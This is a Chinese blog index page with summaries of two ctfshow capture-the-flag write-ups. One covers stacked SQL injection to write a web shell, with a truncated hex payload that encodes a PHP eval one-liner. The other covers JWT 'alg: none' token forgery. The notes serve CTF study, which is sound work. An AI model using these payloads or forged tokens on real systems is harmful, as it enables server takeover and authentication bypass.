2026年1月16日

ctfshow-堆叠注入写Shell

摘要: 看答案做了一下笔记 select * from account where username='' and password='' 单引号被禁用 username= password=; select 0x3c3f706870206576616c28245f504f53545b315d293b3f3 阅读全文

posted @ 2026-01-16 20:48 misaki%20mei 阅读(11) 评论(0) 推荐(0)

ctfshow-JWT令牌伪造

摘要: JWT的格式: JWTnone攻击的具体操作: "alg":"none" JWT的格式要求: base64URL风格: 要求末尾的=填充字符要删除 把+替换为- 把/替换为_ 阅读全文

posted @ 2026-01-16 20:23 misaki%20mei 阅读(5) 评论(0) 推荐(0)

导航